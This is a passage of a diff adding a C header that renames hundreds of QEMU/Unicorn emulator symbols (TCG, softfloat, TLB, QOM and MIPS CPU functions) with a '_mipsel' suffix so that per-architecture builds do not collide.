+#define qobject_to_qbool qobject_to_qbool_mipsel +#define qobject_to_qdict qobject_to_qdict_mipsel +#define qobject_to_qfloat qobject_to_qfloat_mipsel +#define qobject_to_qint qobject_to_qint_mipsel +#define qobject_to_qlist qobject_to_qlist_mipsel +#define qobject_to_qstring qobject_to_qstring_mipsel +#define qobject_type qobject_type_mipsel +#define qstring_append qstring_append_mipsel +#define qstring_append_chr qstring_append_chr_mipsel +#define qstring_append_int qstring_append_int_mipsel +#define qstring_destroy_obj qstring_destroy_obj_mipsel +#define qstring_from_escaped_str qstring_from_escaped_str_mipsel +#define qstring_from_str qstring_from_str_mipsel +#define qstring_from_substr qstring_from_substr_mipsel +#define qstring_get_length qstring_get_length_mipsel +#define qstring_get_str qstring_get_str_mipsel +#define qstring_new qstring_new_mipsel +#define qstring_type qstring_type_mipsel +#define ram_block_add ram_block_add_mipsel +#define ram_size ram_size_mipsel +#define range_compare range_compare_mipsel +#define range_covers_byte range_covers_byte_mipsel +#define range_get_last range_get_last_mipsel +#define range_merge range_merge_mipsel +#define ranges_can_merge ranges_can_merge_mipsel +#define raw_read raw_read_mipsel +#define raw_write raw_write_mipsel +#define rcon rcon_mipsel +#define read_raw_cp_reg read_raw_cp_reg_mipsel +#define recip_estimate recip_estimate_mipsel +#define recip_sqrt_estimate recip_sqrt_estimate_mipsel +#define register_cp_regs_for_features register_cp_regs_for_features_mipsel +#define register_multipage register_multipage_mipsel +#define register_subpage register_subpage_mipsel +#define register_tm_clones register_tm_clones_mipsel +#define register_types_object register_types_object_mipsel +#define regnames regnames_mipsel +#define render_memory_region render_memory_region_mipsel +#define reset_all_temps reset_all_temps_mipsel +#define reset_temp reset_temp_mipsel +#define rol32 rol32_mipsel +#define rol64 rol64_mipsel 
+#define ror32 ror32_mipsel +#define ror64 ror64_mipsel +#define roundAndPackFloat128 roundAndPackFloat128_mipsel +#define roundAndPackFloat16 roundAndPackFloat16_mipsel +#define roundAndPackFloat32 roundAndPackFloat32_mipsel +#define roundAndPackFloat64 roundAndPackFloat64_mipsel +#define roundAndPackFloatx80 roundAndPackFloatx80_mipsel +#define roundAndPackInt32 roundAndPackInt32_mipsel +#define roundAndPackInt64 roundAndPackInt64_mipsel +#define roundAndPackUint64 roundAndPackUint64_mipsel +#define round_to_inf round_to_inf_mipsel +#define run_on_cpu run_on_cpu_mipsel +#define s0 s0_mipsel +#define S0 S0_mipsel +#define s1 s1_mipsel +#define S1 S1_mipsel +#define sa1100_initfn sa1100_initfn_mipsel +#define sa1110_initfn sa1110_initfn_mipsel +#define save_globals save_globals_mipsel +#define scr_write scr_write_mipsel +#define sctlr_write sctlr_write_mipsel +#define set_bit set_bit_mipsel +#define set_bits set_bits_mipsel +#define set_default_nan_mode set_default_nan_mode_mipsel +#define set_feature set_feature_mipsel +#define set_float_detect_tininess set_float_detect_tininess_mipsel +#define set_float_exception_flags set_float_exception_flags_mipsel +#define set_float_rounding_mode set_float_rounding_mode_mipsel +#define set_flush_inputs_to_zero set_flush_inputs_to_zero_mipsel +#define set_flush_to_zero set_flush_to_zero_mipsel +#define set_swi_errno set_swi_errno_mipsel +#define sextract32 sextract32_mipsel +#define sextract64 sextract64_mipsel +#define shift128ExtraRightJamming shift128ExtraRightJamming_mipsel +#define shift128Right shift128Right_mipsel +#define shift128RightJamming shift128RightJamming_mipsel +#define shift32RightJamming shift32RightJamming_mipsel +#define shift64ExtraRightJamming shift64ExtraRightJamming_mipsel +#define shift64RightJamming shift64RightJamming_mipsel +#define shifter_out_im shifter_out_im_mipsel +#define shortShift128Left shortShift128Left_mipsel +#define shortShift192Left shortShift192Left_mipsel +#define simple_mpu_ap_bits 
simple_mpu_ap_bits_mipsel +#define size_code_gen_buffer size_code_gen_buffer_mipsel +#define softmmu_lock_user softmmu_lock_user_mipsel +#define softmmu_lock_user_string softmmu_lock_user_string_mipsel +#define softmmu_tget32 softmmu_tget32_mipsel +#define softmmu_tget8 softmmu_tget8_mipsel +#define softmmu_tput32 softmmu_tput32_mipsel +#define softmmu_unlock_user softmmu_unlock_user_mipsel +#define sort_constraints sort_constraints_mipsel +#define sp_el0_access sp_el0_access_mipsel +#define spsel_read spsel_read_mipsel +#define spsel_write spsel_write_mipsel +#define start_list start_list_mipsel +#define stb_p stb_p_mipsel +#define stb_phys stb_phys_mipsel +#define stl_be_p stl_be_p_mipsel +#define stl_be_phys stl_be_phys_mipsel +#define stl_he_p stl_he_p_mipsel +#define stl_le_p stl_le_p_mipsel +#define stl_le_phys stl_le_phys_mipsel +#define stl_phys stl_phys_mipsel +#define stl_phys_internal stl_phys_internal_mipsel +#define stl_phys_notdirty stl_phys_notdirty_mipsel +#define store_cpu_offset store_cpu_offset_mipsel +#define store_reg store_reg_mipsel +#define store_reg_bx store_reg_bx_mipsel +#define store_reg_from_load store_reg_from_load_mipsel +#define stq_be_p stq_be_p_mipsel +#define stq_be_phys stq_be_phys_mipsel +#define stq_he_p stq_he_p_mipsel +#define stq_le_p stq_le_p_mipsel +#define stq_le_phys stq_le_phys_mipsel +#define stq_phys stq_phys_mipsel +#define string_input_get_visitor string_input_get_visitor_mipsel +#define string_input_visitor_cleanup string_input_visitor_cleanup_mipsel +#define string_input_visitor_new string_input_visitor_new_mipsel +#define strongarm_cp_reginfo strongarm_cp_reginfo_mipsel +#define strstart strstart_mipsel +#define strtosz strtosz_mipsel +#define strtosz_suffix strtosz_suffix_mipsel +#define stw_be_p stw_be_p_mipsel +#define stw_be_phys stw_be_phys_mipsel +#define stw_he_p stw_he_p_mipsel +#define stw_le_p stw_le_p_mipsel +#define stw_le_phys stw_le_phys_mipsel +#define stw_phys stw_phys_mipsel +#define 
stw_phys_internal stw_phys_internal_mipsel +#define sub128 sub128_mipsel +#define sub16_sat sub16_sat_mipsel +#define sub16_usat sub16_usat_mipsel +#define sub192 sub192_mipsel +#define sub8_sat sub8_sat_mipsel +#define sub8_usat sub8_usat_mipsel +#define subFloat128Sigs subFloat128Sigs_mipsel +#define subFloat32Sigs subFloat32Sigs_mipsel +#define subFloat64Sigs subFloat64Sigs_mipsel +#define subFloatx80Sigs subFloatx80Sigs_mipsel +#define subpage_accepts subpage_accepts_mipsel +#define subpage_init subpage_init_mipsel +#define subpage_ops subpage_ops_mipsel +#define subpage_read subpage_read_mipsel +#define subpage_register subpage_register_mipsel +#define subpage_write subpage_write_mipsel +#define suffix_mul suffix_mul_mipsel +#define swap_commutative swap_commutative_mipsel +#define swap_commutative2 swap_commutative2_mipsel +#define switch_mode switch_mode_mipsel +#define switch_v7m_sp switch_v7m_sp_mipsel +#define syn_aa32_bkpt syn_aa32_bkpt_mipsel +#define syn_aa32_hvc syn_aa32_hvc_mipsel +#define syn_aa32_smc syn_aa32_smc_mipsel +#define syn_aa32_svc syn_aa32_svc_mipsel +#define syn_breakpoint syn_breakpoint_mipsel +#define sync_globals sync_globals_mipsel +#define syn_cp14_rrt_trap syn_cp14_rrt_trap_mipsel +#define syn_cp14_rt_trap syn_cp14_rt_trap_mipsel +#define syn_cp15_rrt_trap syn_cp15_rrt_trap_mipsel +#define syn_cp15_rt_trap syn_cp15_rt_trap_mipsel +#define syn_data_abort syn_data_abort_mipsel +#define syn_fp_access_trap syn_fp_access_trap_mipsel +#define syn_insn_abort syn_insn_abort_mipsel +#define syn_swstep syn_swstep_mipsel +#define syn_uncategorized syn_uncategorized_mipsel +#define syn_watchpoint syn_watchpoint_mipsel +#define syscall_err syscall_err_mipsel +#define system_bus_class_init system_bus_class_init_mipsel +#define system_bus_info system_bus_info_mipsel +#define t2ee_cp_reginfo t2ee_cp_reginfo_mipsel +#define table_logic_cc table_logic_cc_mipsel +#define target_parse_constraint target_parse_constraint_mipsel +#define 
target_words_bigendian target_words_bigendian_mipsel +#define tb_add_jump tb_add_jump_mipsel +#define tb_alloc tb_alloc_mipsel +#define tb_alloc_page tb_alloc_page_mipsel +#define tb_check_watchpoint tb_check_watchpoint_mipsel +#define tb_find_fast tb_find_fast_mipsel +#define tb_find_pc tb_find_pc_mipsel +#define tb_find_slow tb_find_slow_mipsel +#define tb_flush tb_flush_mipsel +#define tb_flush_jmp_cache tb_flush_jmp_cache_mipsel +#define tb_free tb_free_mipsel +#define tb_gen_code tb_gen_code_mipsel +#define tb_hash_remove tb_hash_remove_mipsel +#define tb_invalidate_phys_addr tb_invalidate_phys_addr_mipsel +#define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_mipsel +#define tb_invalidate_phys_range tb_invalidate_phys_range_mipsel +#define tb_jmp_cache_hash_func tb_jmp_cache_hash_func_mipsel +#define tb_jmp_cache_hash_page tb_jmp_cache_hash_page_mipsel +#define tb_jmp_remove tb_jmp_remove_mipsel +#define tb_link_page tb_link_page_mipsel +#define tb_page_remove tb_page_remove_mipsel +#define tb_phys_hash_func tb_phys_hash_func_mipsel +#define tb_phys_invalidate tb_phys_invalidate_mipsel +#define tb_reset_jump tb_reset_jump_mipsel +#define tb_set_jmp_target tb_set_jmp_target_mipsel +#define tcg_accel_class_init tcg_accel_class_init_mipsel +#define tcg_accel_type tcg_accel_type_mipsel +#define tcg_add_param_i32 tcg_add_param_i32_mipsel +#define tcg_add_param_i64 tcg_add_param_i64_mipsel +#define tcg_add_target_add_op_defs tcg_add_target_add_op_defs_mipsel +#define tcg_allowed tcg_allowed_mipsel +#define tcg_canonicalize_memop tcg_canonicalize_memop_mipsel +#define tcg_commit tcg_commit_mipsel +#define tcg_cond_to_jcc tcg_cond_to_jcc_mipsel +#define tcg_constant_folding tcg_constant_folding_mipsel +#define tcg_const_i32 tcg_const_i32_mipsel +#define tcg_const_i64 tcg_const_i64_mipsel +#define tcg_const_local_i32 tcg_const_local_i32_mipsel +#define tcg_const_local_i64 tcg_const_local_i64_mipsel +#define tcg_context_init tcg_context_init_mipsel 
+#define tcg_cpu_address_space_init tcg_cpu_address_space_init_mipsel +#define tcg_cpu_exec tcg_cpu_exec_mipsel +#define tcg_current_code_size tcg_current_code_size_mipsel +#define tcg_dump_info tcg_dump_info_mipsel +#define tcg_dump_ops tcg_dump_ops_mipsel +#define tcg_exec_all tcg_exec_all_mipsel +#define tcg_find_helper tcg_find_helper_mipsel +#define tcg_func_start tcg_func_start_mipsel +#define tcg_gen_abs_i32 tcg_gen_abs_i32_mipsel +#define tcg_gen_add2_i32 tcg_gen_add2_i32_mipsel +#define tcg_gen_add_i32 tcg_gen_add_i32_mipsel +#define tcg_gen_add_i64 tcg_gen_add_i64_mipsel +#define tcg_gen_addi_i32 tcg_gen_addi_i32_mipsel +#define tcg_gen_addi_i64 tcg_gen_addi_i64_mipsel +#define tcg_gen_andc_i32 tcg_gen_andc_i32_mipsel +#define tcg_gen_and_i32 tcg_gen_and_i32_mipsel +#define tcg_gen_and_i64 tcg_gen_and_i64_mipsel +#define tcg_gen_andi_i32 tcg_gen_andi_i32_mipsel +#define tcg_gen_andi_i64 tcg_gen_andi_i64_mipsel +#define tcg_gen_br tcg_gen_br_mipsel +#define tcg_gen_brcond_i32 tcg_gen_brcond_i32_mipsel +#define tcg_gen_brcond_i64 tcg_gen_brcond_i64_mipsel +#define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_mipsel +#define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_mipsel +#define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_mipsel +#define tcg_gen_callN tcg_gen_callN_mipsel +#define tcg_gen_code tcg_gen_code_mipsel +#define tcg_gen_code_common tcg_gen_code_common_mipsel +#define tcg_gen_code_search_pc tcg_gen_code_search_pc_mipsel +#define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_mipsel +#define tcg_gen_debug_insn_start tcg_gen_debug_insn_start_mipsel +#define tcg_gen_deposit_i32 tcg_gen_deposit_i32_mipsel +#define tcg_gen_exit_tb tcg_gen_exit_tb_mipsel +#define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_mipsel +#define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_mipsel +#define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_mipsel +#define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_mipsel +#define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_mipsel +#define tcg_gen_ext8u_i32 
tcg_gen_ext8u_i32_mipsel +#define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_mipsel +#define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_mipsel +#define tcg_gen_goto_tb tcg_gen_goto_tb_mipsel +#define tcg_gen_ld_i32 tcg_gen_ld_i32_mipsel +#define tcg_gen_ld_i64 tcg_gen_ld_i64_mipsel +#define tcg_gen_ldst_op_i32 tcg_gen_ldst_op_i32_mipsel +#define tcg_gen_ldst_op_i64 tcg_gen_ldst_op_i64_mipsel +#define tcg_gen_movcond_i32 tcg_gen_movcond_i32_mipsel +#define tcg_gen_movcond_i64 tcg_gen_movcond_i64_mipsel +#define tcg_gen_mov_i32 tcg_gen_mov_i32_mipsel +#define tcg_gen_mov_i64 tcg_gen_mov_i64_mipsel +#define tcg_gen_movi_i32 tcg_gen_movi_i32_mipsel +#define tcg_gen_movi_i64 tcg_gen_movi_i64_mipsel +#define tcg_gen_mul_i32 tcg_gen_mul_i32_mipsel +#define tcg_gen_muls2_i32 tcg_gen_muls2_i32_mipsel +#define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_mipsel +#define tcg_gen_neg_i32 tcg_gen_neg_i32_mipsel +#define tcg_gen_neg_i64 tcg_gen_neg_i64_mipsel +#define tcg_gen_not_i32 tcg_gen_not_i32_mipsel +#define tcg_gen_op0 tcg_gen_op0_mipsel +#define tcg_gen_op1i tcg_gen_op1i_mipsel +#define tcg_gen_op2_i32 tcg_gen_op2_i32_mipsel +#define tcg_gen_op2_i64 tcg_gen_op2_i64_mipsel +#define tcg_gen_op2i_i32 tcg_gen_op2i_i32_mipsel +#define tcg_gen_op2i_i64 tcg_gen_op2i_i64_mipsel +#define tcg_gen_op3_i32 tcg_gen_op3_i32_mipsel +#define tcg_gen_op3_i64 tcg_gen_op3_i64_mipsel +#define tcg_gen_op4_i32 tcg_gen_op4_i32_mipsel +#define tcg_gen_op4i_i32 tcg_gen_op4i_i32_mipsel +#define tcg_gen_op4ii_i32 tcg_gen_op4ii_i32_mipsel +#define tcg_gen_op4ii_i64 tcg_gen_op4ii_i64_mipsel +#define tcg_gen_op5ii_i32 tcg_gen_op5ii_i32_mipsel +#define tcg_gen_op6_i32 tcg_gen_op6_i32_mipsel +#define tcg_gen_op6i_i32 tcg_gen_op6i_i32_mipsel +#define tcg_gen_op6i_i64 tcg_gen_op6i_i64_mipsel +#define tcg_gen_orc_i32 tcg_gen_orc_i32_mipsel +#define tcg_gen_or_i32 tcg_gen_or_i32_mipsel +#define tcg_gen_or_i64 tcg_gen_or_i64_mipsel +#define tcg_gen_ori_i32 tcg_gen_ori_i32_mipsel +#define tcg_gen_qemu_ld_i32 
tcg_gen_qemu_ld_i32_mipsel +#define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_mipsel +#define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_mipsel +#define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_mipsel +#define tcg_gen_rotl_i32 tcg_gen_rotl_i32_mipsel +#define tcg_gen_rotli_i32 tcg_gen_rotli_i32_mipsel +#define tcg_gen_rotr_i32 tcg_gen_rotr_i32_mipsel +#define tcg_gen_rotri_i32 tcg_gen_rotri_i32_mipsel +#define tcg_gen_sar_i32 tcg_gen_sar_i32_mipsel +#define tcg_gen_sari_i32 tcg_gen_sari_i32_mipsel +#define tcg_gen_setcond_i32 tcg_gen_setcond_i32_mipsel +#define tcg_gen_shl_i32 tcg_gen_shl_i32_mipsel +#define tcg_gen_shl_i64 tcg_gen_shl_i64_mipsel +#define tcg_gen_shli_i32 tcg_gen_shli_i32_mipsel +#define tcg_gen_shli_i64 tcg_gen_shli_i64_mipsel +#define tcg_gen_shr_i32 tcg_gen_shr_i32_mipsel +#define tcg_gen_shifti_i64 tcg_gen_shifti_i64_mipsel +#define tcg_gen_shr_i64 tcg_gen_shr_i64_mipsel +#define tcg_gen_shri_i32 tcg_gen_shri_i32_mipsel +#define tcg_gen_shri_i64 tcg_gen_shri_i64_mipsel +#define tcg_gen_st_i32 tcg_gen_st_i32_mipsel +#define tcg_gen_st_i64 tcg_gen_st_i64_mipsel +#define tcg_gen_sub_i32 tcg_gen_sub_i32_mipsel +#define tcg_gen_sub_i64 tcg_gen_sub_i64_mipsel +#define tcg_gen_subi_i32 tcg_gen_subi_i32_mipsel +#define tcg_gen_trunc_i64_i32 tcg_gen_trunc_i64_i32_mipsel +#define tcg_gen_trunc_shr_i64_i32 tcg_gen_trunc_shr_i64_i32_mipsel +#define tcg_gen_xor_i32 tcg_gen_xor_i32_mipsel +#define tcg_gen_xor_i64 tcg_gen_xor_i64_mipsel +#define tcg_gen_xori_i32 tcg_gen_xori_i32_mipsel +#define tcg_get_arg_str_i32 tcg_get_arg_str_i32_mipsel +#define tcg_get_arg_str_i64 tcg_get_arg_str_i64_mipsel +#define tcg_get_arg_str_idx tcg_get_arg_str_idx_mipsel +#define tcg_global_mem_new_i32 tcg_global_mem_new_i32_mipsel +#define tcg_global_mem_new_i64 tcg_global_mem_new_i64_mipsel +#define tcg_global_mem_new_internal tcg_global_mem_new_internal_mipsel +#define tcg_global_reg_new_i32 tcg_global_reg_new_i32_mipsel +#define tcg_global_reg_new_i64 tcg_global_reg_new_i64_mipsel 
+#define tcg_global_reg_new_internal tcg_global_reg_new_internal_mipsel +#define tcg_handle_interrupt tcg_handle_interrupt_mipsel +#define tcg_init tcg_init_mipsel +#define tcg_invert_cond tcg_invert_cond_mipsel +#define tcg_la_bb_end tcg_la_bb_end_mipsel +#define tcg_la_br_end tcg_la_br_end_mipsel +#define tcg_la_func_end tcg_la_func_end_mipsel +#define tcg_liveness_analysis tcg_liveness_analysis_mipsel +#define tcg_malloc tcg_malloc_mipsel +#define tcg_malloc_internal tcg_malloc_internal_mipsel +#define tcg_op_defs_org tcg_op_defs_org_mipsel +#define tcg_opt_gen_mov tcg_opt_gen_mov_mipsel +#define tcg_opt_gen_movi tcg_opt_gen_movi_mipsel +#define tcg_optimize tcg_optimize_mipsel +#define tcg_out16 tcg_out16_mipsel +#define tcg_out32 tcg_out32_mipsel +#define tcg_out64 tcg_out64_mipsel +#define tcg_out8 tcg_out8_mipsel +#define tcg_out_addi tcg_out_addi_mipsel +#define tcg_out_branch tcg_out_branch_mipsel +#define tcg_out_brcond32 tcg_out_brcond32_mipsel +#define tcg_out_brcond64 tcg_out_brcond64_mipsel +#define tcg_out_bswap32 tcg_out_bswap32_mipsel +#define tcg_out_bswap64 tcg_out_bswap64_mipsel +#define tcg_out_call tcg_out_call_mipsel +#define tcg_out_cmp tcg_out_cmp_mipsel +#define tcg_out_ext16s tcg_out_ext16s_mipsel +#define tcg_out_ext16u tcg_out_ext16u_mipsel +#define tcg_out_ext32s tcg_out_ext32s_mipsel +#define tcg_out_ext32u tcg_out_ext32u_mipsel +#define tcg_out_ext8s tcg_out_ext8s_mipsel +#define tcg_out_ext8u tcg_out_ext8u_mipsel +#define tcg_out_jmp tcg_out_jmp_mipsel +#define tcg_out_jxx tcg_out_jxx_mipsel +#define tcg_out_label tcg_out_label_mipsel +#define tcg_out_ld tcg_out_ld_mipsel +#define tcg_out_modrm tcg_out_modrm_mipsel +#define tcg_out_modrm_offset tcg_out_modrm_offset_mipsel +#define tcg_out_modrm_sib_offset tcg_out_modrm_sib_offset_mipsel +#define tcg_out_mov tcg_out_mov_mipsel +#define tcg_out_movcond32 tcg_out_movcond32_mipsel +#define tcg_out_movcond64 tcg_out_movcond64_mipsel +#define tcg_out_movi tcg_out_movi_mipsel +#define 
tcg_out_op tcg_out_op_mipsel +#define tcg_out_pop tcg_out_pop_mipsel +#define tcg_out_push tcg_out_push_mipsel +#define tcg_out_qemu_ld tcg_out_qemu_ld_mipsel +#define tcg_out_qemu_ld_direct tcg_out_qemu_ld_direct_mipsel +#define tcg_out_qemu_ld_slow_path tcg_out_qemu_ld_slow_path_mipsel +#define tcg_out_qemu_st tcg_out_qemu_st_mipsel +#define tcg_out_qemu_st_direct tcg_out_qemu_st_direct_mipsel +#define tcg_out_qemu_st_slow_path tcg_out_qemu_st_slow_path_mipsel +#define tcg_out_reloc tcg_out_reloc_mipsel +#define tcg_out_rolw_8 tcg_out_rolw_8_mipsel +#define tcg_out_setcond32 tcg_out_setcond32_mipsel +#define tcg_out_setcond64 tcg_out_setcond64_mipsel +#define tcg_out_shifti tcg_out_shifti_mipsel +#define tcg_out_st tcg_out_st_mipsel +#define tcg_out_tb_finalize tcg_out_tb_finalize_mipsel +#define tcg_out_tb_init tcg_out_tb_init_mipsel +#define tcg_out_tlb_load tcg_out_tlb_load_mipsel +#define tcg_out_vex_modrm tcg_out_vex_modrm_mipsel +#define tcg_patch32 tcg_patch32_mipsel +#define tcg_patch8 tcg_patch8_mipsel +#define tcg_pcrel_diff tcg_pcrel_diff_mipsel +#define tcg_pool_reset tcg_pool_reset_mipsel +#define tcg_prologue_init tcg_prologue_init_mipsel +#define tcg_ptr_byte_diff tcg_ptr_byte_diff_mipsel +#define tcg_reg_alloc tcg_reg_alloc_mipsel +#define tcg_reg_alloc_bb_end tcg_reg_alloc_bb_end_mipsel +#define tcg_reg_alloc_call tcg_reg_alloc_call_mipsel +#define tcg_reg_alloc_mov tcg_reg_alloc_mov_mipsel +#define tcg_reg_alloc_movi tcg_reg_alloc_movi_mipsel +#define tcg_reg_alloc_op tcg_reg_alloc_op_mipsel +#define tcg_reg_alloc_start tcg_reg_alloc_start_mipsel +#define tcg_reg_free tcg_reg_free_mipsel +#define tcg_reg_sync tcg_reg_sync_mipsel +#define tcg_set_frame tcg_set_frame_mipsel +#define tcg_set_nop tcg_set_nop_mipsel +#define tcg_swap_cond tcg_swap_cond_mipsel +#define tcg_target_callee_save_regs tcg_target_callee_save_regs_mipsel +#define tcg_target_call_iarg_regs tcg_target_call_iarg_regs_mipsel +#define tcg_target_call_oarg_regs 
tcg_target_call_oarg_regs_mipsel +#define tcg_target_const_match tcg_target_const_match_mipsel +#define tcg_target_init tcg_target_init_mipsel +#define tcg_target_qemu_prologue tcg_target_qemu_prologue_mipsel +#define tcg_target_reg_alloc_order tcg_target_reg_alloc_order_mipsel +#define tcg_temp_alloc tcg_temp_alloc_mipsel +#define tcg_temp_free_i32 tcg_temp_free_i32_mipsel +#define tcg_temp_free_i64 tcg_temp_free_i64_mipsel +#define tcg_temp_free_internal tcg_temp_free_internal_mipsel +#define tcg_temp_local_new_i32 tcg_temp_local_new_i32_mipsel +#define tcg_temp_local_new_i64 tcg_temp_local_new_i64_mipsel +#define tcg_temp_new_i32 tcg_temp_new_i32_mipsel +#define tcg_temp_new_i64 tcg_temp_new_i64_mipsel +#define tcg_temp_new_internal tcg_temp_new_internal_mipsel +#define tcg_temp_new_internal_i32 tcg_temp_new_internal_i32_mipsel +#define tcg_temp_new_internal_i64 tcg_temp_new_internal_i64_mipsel +#define tdb_hash tdb_hash_mipsel +#define teecr_write teecr_write_mipsel +#define teehbr_access teehbr_access_mipsel +#define temp_allocate_frame temp_allocate_frame_mipsel +#define temp_dead temp_dead_mipsel +#define temps_are_copies temps_are_copies_mipsel +#define temp_save temp_save_mipsel +#define temp_sync temp_sync_mipsel +#define tgen_arithi tgen_arithi_mipsel +#define tgen_arithr tgen_arithr_mipsel +#define thumb2_logic_op thumb2_logic_op_mipsel +#define ti925t_initfn ti925t_initfn_mipsel +#define tlb_add_large_page tlb_add_large_page_mipsel +#define tlb_flush_entry tlb_flush_entry_mipsel +#define tlbi_aa64_asid_is_write tlbi_aa64_asid_is_write_mipsel +#define tlbi_aa64_asid_write tlbi_aa64_asid_write_mipsel +#define tlbi_aa64_vaa_is_write tlbi_aa64_vaa_is_write_mipsel +#define tlbi_aa64_vaa_write tlbi_aa64_vaa_write_mipsel +#define tlbi_aa64_va_is_write tlbi_aa64_va_is_write_mipsel +#define tlbi_aa64_va_write tlbi_aa64_va_write_mipsel +#define tlbiall_is_write tlbiall_is_write_mipsel +#define tlbiall_write tlbiall_write_mipsel +#define tlbiasid_is_write 
tlbiasid_is_write_mipsel +#define tlbiasid_write tlbiasid_write_mipsel +#define tlbimvaa_is_write tlbimvaa_is_write_mipsel +#define tlbimvaa_write tlbimvaa_write_mipsel +#define tlbimva_is_write tlbimva_is_write_mipsel +#define tlbimva_write tlbimva_write_mipsel +#define tlb_is_dirty_ram tlb_is_dirty_ram_mipsel +#define tlb_protect_code tlb_protect_code_mipsel +#define tlb_reset_dirty_range tlb_reset_dirty_range_mipsel +#define tlb_reset_dirty_range_all tlb_reset_dirty_range_all_mipsel +#define tlb_set_dirty tlb_set_dirty_mipsel +#define tlb_set_dirty1 tlb_set_dirty1_mipsel +#define tlb_unprotect_code_phys tlb_unprotect_code_phys_mipsel +#define tlb_vaddr_to_host tlb_vaddr_to_host_mipsel +#define token_get_type token_get_type_mipsel +#define token_get_value token_get_value_mipsel +#define token_is_escape token_is_escape_mipsel +#define token_is_keyword token_is_keyword_mipsel +#define token_is_operator token_is_operator_mipsel +#define tokens_append_from_iter tokens_append_from_iter_mipsel +#define to_qiv to_qiv_mipsel +#define to_qov to_qov_mipsel +#define tosa_init tosa_init_mipsel +#define tosa_machine_init tosa_machine_init_mipsel +#define tswap32 tswap32_mipsel +#define tswap64 tswap64_mipsel +#define type_class_get_size type_class_get_size_mipsel +#define type_get_by_name type_get_by_name_mipsel +#define type_get_parent type_get_parent_mipsel +#define type_has_parent type_has_parent_mipsel +#define type_initialize type_initialize_mipsel +#define type_initialize_interface type_initialize_interface_mipsel +#define type_is_ancestor type_is_ancestor_mipsel +#define type_new type_new_mipsel +#define type_object_get_size type_object_get_size_mipsel +#define type_register_internal type_register_internal_mipsel +#define type_table_add type_table_add_mipsel +#define type_table_get type_table_get_mipsel +#define type_table_lookup type_table_lookup_mipsel +#define uint16_to_float32 uint16_to_float32_mipsel +#define uint16_to_float64 uint16_to_float64_mipsel +#define 
uint32_to_float32 uint32_to_float32_mipsel +#define uint32_to_float64 uint32_to_float64_mipsel +#define uint64_to_float128 uint64_to_float128_mipsel +#define uint64_to_float32 uint64_to_float32_mipsel +#define uint64_to_float64 uint64_to_float64_mipsel +#define unassigned_io_ops unassigned_io_ops_mipsel +#define unassigned_io_read unassigned_io_read_mipsel +#define unassigned_io_write unassigned_io_write_mipsel +#define unassigned_mem_accepts unassigned_mem_accepts_mipsel +#define unassigned_mem_ops unassigned_mem_ops_mipsel +#define unassigned_mem_read unassigned_mem_read_mipsel +#define unassigned_mem_write unassigned_mem_write_mipsel +#define update_spsel update_spsel_mipsel +#define v6_cp_reginfo v6_cp_reginfo_mipsel +#define v6k_cp_reginfo v6k_cp_reginfo_mipsel +#define v7_cp_reginfo v7_cp_reginfo_mipsel +#define v7mp_cp_reginfo v7mp_cp_reginfo_mipsel +#define v7m_pop v7m_pop_mipsel +#define v7m_push v7m_push_mipsel +#define v8_cp_reginfo v8_cp_reginfo_mipsel +#define v8_el2_cp_reginfo v8_el2_cp_reginfo_mipsel +#define v8_el3_cp_reginfo v8_el3_cp_reginfo_mipsel +#define v8_el3_no_el2_cp_reginfo v8_el3_no_el2_cp_reginfo_mipsel +#define vapa_cp_reginfo vapa_cp_reginfo_mipsel +#define vbar_write vbar_write_mipsel +#define vfp_exceptbits_from_host vfp_exceptbits_from_host_mipsel +#define vfp_exceptbits_to_host vfp_exceptbits_to_host_mipsel +#define vfp_get_fpcr vfp_get_fpcr_mipsel +#define vfp_get_fpscr vfp_get_fpscr_mipsel +#define vfp_get_fpsr vfp_get_fpsr_mipsel +#define vfp_reg_offset vfp_reg_offset_mipsel +#define vfp_set_fpcr vfp_set_fpcr_mipsel +#define vfp_set_fpscr vfp_set_fpscr_mipsel +#define vfp_set_fpsr vfp_set_fpsr_mipsel +#define visit_end_implicit_struct visit_end_implicit_struct_mipsel +#define visit_end_list visit_end_list_mipsel +#define visit_end_struct visit_end_struct_mipsel +#define visit_end_union visit_end_union_mipsel +#define visit_get_next_type visit_get_next_type_mipsel +#define visit_next_list visit_next_list_mipsel +#define 
visit_optional visit_optional_mipsel +#define visit_start_implicit_struct visit_start_implicit_struct_mipsel +#define visit_start_list visit_start_list_mipsel +#define visit_start_struct visit_start_struct_mipsel +#define visit_start_union visit_start_union_mipsel +#define vmsa_cp_reginfo vmsa_cp_reginfo_mipsel +#define vmsa_tcr_el1_write vmsa_tcr_el1_write_mipsel +#define vmsa_ttbcr_raw_write vmsa_ttbcr_raw_write_mipsel +#define vmsa_ttbcr_reset vmsa_ttbcr_reset_mipsel +#define vmsa_ttbcr_write vmsa_ttbcr_write_mipsel +#define vmsa_ttbr_write vmsa_ttbr_write_mipsel +#define write_cpustate_to_list write_cpustate_to_list_mipsel +#define write_list_to_cpustate write_list_to_cpustate_mipsel +#define write_raw_cp_reg write_raw_cp_reg_mipsel +#define X86CPURegister32_lookup X86CPURegister32_lookup_mipsel +#define x86_op_defs x86_op_defs_mipsel +#define xpsr_read xpsr_read_mipsel +#define xpsr_write xpsr_write_mipsel +#define xscale_cpar_write xscale_cpar_write_mipsel +#define xscale_cp_reginfo xscale_cp_reginfo_mipsel +#define cpu_mips_exec cpu_mips_exec_mipsel +#define cpu_mips_get_random cpu_mips_get_random_mipsel +#define cpu_mips_get_count cpu_mips_get_count_mipsel +#define cpu_mips_store_count cpu_mips_store_count_mipsel +#define cpu_mips_store_compare cpu_mips_store_compare_mipsel +#define cpu_mips_start_count cpu_mips_start_count_mipsel +#define cpu_mips_stop_count cpu_mips_stop_count_mipsel +#define 